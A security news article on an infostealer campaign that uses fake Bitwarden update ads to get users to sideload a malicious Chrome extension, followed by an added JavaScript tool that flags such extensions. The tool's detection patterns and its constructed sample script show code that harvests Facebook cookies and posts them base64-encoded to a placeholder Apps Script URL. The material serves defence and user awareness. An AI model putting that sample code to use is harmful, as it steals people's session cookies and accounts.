Infostealer spreads via fake Bitwarden ads on social media

November 28, 2024
Fake Bitwarden Ads Infostealer Malware Social Media

A new malware campaign uses fake Bitwarden ads on social media platforms like Facebook to push a malicious Google Chrome extension that could capture and steal sensitive user information from the browser.

Bitwarden is a popular password manager tool with a free tier that includes end-to-end encryption, cross-platform support, MFA, and a user-friendly UI. Its user base has consistently increased in recent years since various competitors suffered security breaches, prompting users to seek alternatives.


The fake Bitwarden ads leverage a bogus alert to introduce a malicious update.


According to the researchers who analysed the campaign, the fake Facebook ads warn users that they are running an outdated version of Bitwarden and must update it immediately to keep their credentials safe.

Clicking the ad sends the visitor to an attacker-controlled landing page. Instead of installing the extension directly, that page instructs the visitor to download a ZIP archive from a Google Drive folder.

A legitimate Chrome extension is installed from the Chrome Web Store with a single click, so being asked to download an archive should be a significant red flag. Inexperienced users, however, may simply follow the step-by-step directions on the page. Those directions have the victim enable Developer mode in chrome://extensions and load the unpacked extension from the extracted archive, which sideloads it into the browser without any of the Chrome Web Store's review checks.

Once loaded, the extension appears in the browser as ‘Bitwarden Password Manager’ version 0.0.1, and its manifest requests permissions that let it intercept and alter the user's browsing activity.

The researchers found that the campaign's main objectives are: collecting Facebook cookies; using public APIs to gather the victim's IP address and geolocation; retrieving Facebook user details, account information, and billing data via Facebook's Graph API; manipulating the page DOM to display bogus loading messages while this happens; and encoding the stolen data before sending it to an attacker-controlled Google Apps Script URL. Notably, none of this touches Bitwarden vaults or stored passwords: the password manager is only the lure, and the real target is the victim's Facebook account.

Bitwarden users should ignore any advertisement urging them to update the extension: Chrome updates extensions automatically when the vendor publishes a new version, so a legitimate update never requires a manual download. The researchers also noted that extensions should only be installed from Google's official Chrome Web Store, or by following links from the project's official website.

Users should always review the permissions an extension requests and treat unnecessary demands for cookie, network, or website data access as a warning sign. A placeholder version number such as 0.0.1 and an extension that was never listed in the Chrome Web Store are further warning signs.
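The permission review recommended above, and the behaviours the article attributes to the fake extension, can be turned into a simple triage check. The following is an added example written for this page; it is not code from the article, from Bitwarden, or from the researchers who analysed the campaign. It audits an unpacked extension's manifest.json (the folder a victim would point "Load unpacked" at) and scans its scripts for the cookie-harvesting, Graph API, base64-encoding and Google Apps Script exfiltration behaviours described. The permission names are real Chrome extension permissions; the verdict thresholds, the update_url heuristic, and the sample manifest and script at the bottom are this example's own assumptions, constructed to resemble the described campaign rather than captured from it.

```javascript
// Added example, not code from the article, from Bitwarden, or from the
// campaign's researchers: a triage helper that reviews a sideloaded Chrome
// extension by auditing its manifest.json permissions and scanning its scripts
// for the behaviours the article describes. Permission names are real Chrome
// extension permissions; verdict thresholds are this example's assumptions.
// The sample manifest and script at the bottom are CONSTRUCTED, not captured.

// API permissions that let an extension read or alter data on other sites.
const RISKY_PERMISSIONS = new Set([
  "cookies", "webRequest", "webRequestBlocking", "declarativeNetRequest",
  "scripting", "tabs", "history",
]);

// Chrome Web Store installs carry this update_url in manifest.json; an
// unpacked (sideloaded) extension normally does not. Heuristic only.
const WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx";

// Source indicators for the behaviours named in the article: cookie
// harvesting, Graph API calls, base64 encoding, exfil to a Google Apps Script.
const SOURCE_INDICATORS = [
  { id: "cookie-harvest", re: /chrome\.cookies\.getAll\s*\(/ },
  { id: "facebook-graph-api", re: /graph\.facebook\.com/ },
  { id: "base64-encode", re: /\bbtoa\s*\(/ },
  { id: "apps-script-exfil", re: /script\.google\.com\/macros\// },
];

// "<all_urls>", "*://*/*" and "https://*/*" all grant access to every site.
function isBroadHostPattern(pattern) {
  return pattern === "<all_urls>" || /:\/\/\*\/\*$/.test(pattern);
}

// Manifest findings; handles MV2 (host patterns inside "permissions") and
// MV3 ("host_permissions"). Returns an array of "kind:detail" strings.
function auditManifest(manifest) {
  const findings = [];
  const perms = manifest.permissions || [];
  const hosts = (manifest.host_permissions || []).concat(
    perms.filter((p) => p === "<all_urls>" || p.includes("://")));
  for (const p of perms) if (RISKY_PERMISSIONS.has(p)) findings.push(`permission:${p}`);
  for (const h of hosts) if (isBroadHostPattern(h)) findings.push(`broad-host:${h}`);
  if (manifest.update_url !== WEBSTORE_UPDATE_URL) findings.push("no-webstore-update-url");
  if (/^0\.0\.\d+$/.test(manifest.version || "")) findings.push(`placeholder-version:${manifest.version}`);
  return findings;
}

// Scans each script's text (file name -> source) for the indicators above.
function auditSources(sources) {
  const findings = [];
  for (const [file, code] of Object.entries(sources)) {
    for (const { id, re } of SOURCE_INDICATORS) if (re.test(code)) findings.push(`${id}:${file}`);
  }
  return findings;
}

// Combines both audits into a verdict. Broad host access or the "cookies"
// permission alone is NOT conclusive: a real password manager needs wide host
// access for autofill. Cookie harvesting paired with a Graph API or Apps
// Script channel, or a sideloaded 0.0.x build that also wants cookies, is.
function auditExtension(manifest, sources) {
  const findings = auditManifest(manifest).concat(auditSources(sources));
  const has = (prefix) => findings.some((f) => f.startsWith(prefix));
  let verdict = findings.length ? "review" : "no indicators";
  if ((has("cookie-harvest") && (has("apps-script-exfil") || has("facebook-graph-api"))) ||
      (has("no-webstore-update-url") && has("placeholder-version") && has("permission:cookies"))) {
    verdict = "suspicious";
  }
  return { name: manifest.name, version: manifest.version, findings, verdict };
}

// CONSTRUCTED sample resembling the article's description (name, version
// 0.0.1, cookie + Graph API + Apps Script behaviour). Not real malware: the
// script is an inert string fed to the scanner, and the URL is a placeholder.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Bitwarden Password Manager",
  version: "0.0.1",
  permissions: ["cookies", "tabs", "scripting", "storage"],
  host_permissions: ["<all_urls>"],
  background: { service_worker: "background.js" },
};
const SAMPLE_SOURCES = {
  "background.js": [
    "chrome.cookies.getAll({ domain: 'facebook.com' }, (cookies) => {",
    "  fetch('https://graph.facebook.com/me?fields=id,name');",
    "  fetch('https://script.google.com/macros/s/EXAMPLE/exec',",
    "        { method: 'POST', body: btoa(JSON.stringify(cookies)) });",
    "});",
  ].join("\n"),
};

console.log(JSON.stringify(auditExtension(SAMPLE_MANIFEST, SAMPLE_SOURCES), null, 2));
```

To use it on a real unpacked folder, read manifest.json with JSON.parse and pass the contents of each .js file in the folder as the sources map; the verdict only becomes "suspicious" when the manifest and the code agree, which keeps a legitimate password manager (wide host access, Chrome Web Store update_url, a real version string, no cookie exfiltration) out of the alert set.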
